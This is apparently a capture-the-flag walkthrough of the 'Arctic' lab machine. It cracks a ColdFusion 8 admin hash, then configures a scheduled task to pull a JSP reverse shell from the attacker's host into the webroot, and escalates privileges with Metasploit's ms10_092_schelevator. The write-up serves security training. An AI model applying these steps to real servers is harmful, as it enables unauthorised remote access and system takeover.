Today, we’re going to solve another CTF machine “Arctic”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: Windows
  • IP Address: 10.10.10.11
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Enumeration

Nmap reveals unknown service running on port 8500 and if we browse the page 10.10.10.11:8500

If we browse the CFIDE/ and take a look inside administrator/ it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.

The first thing i did is tested out basic creds which i can think of such as admin:admin/admin:administrator that didn’t work so i checked page source and inspected input fields but it was useless.

After that, Google for “Adobe Coldfusion 8 CVE”

Exploit: https://www.exploit-db.com/exploits/14641

Crack SHA1 Using Hashcat

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Decrypted: happyday

Goto Debugging & Logging > Scheduled Tasks

Let’s Schedule New Task.

Exploitation

This gives an ability to download a file from webserver and save it locally. Under Server Settings > Mapping, We can verify the CFIDE path. Since, our targeted machine is windows we have to create a jsp reverse shell.

Task Name: Shell
URL: http://10.10.14.27:8000/shell.jsp
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task we got reverse shell.

User flag can be obtained from C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Since, we have low privilege shell we can try upgrading to proper shell and go for privilege escalation.

Transfer our shell.exe file to targeted box using powershell.

And we got proper low priv reverse shell.

Since, we don’t know what to exploit for priv esc we’ll do some enumeration and the easiest way to do in metasploit is to use local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got bunch of suggestions through x86 shell but let’see what we get through x64 shell.

Now, that we’re x64 let’s run local_exploit_suggester again.

Not much of a difference let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Look’s like it worked!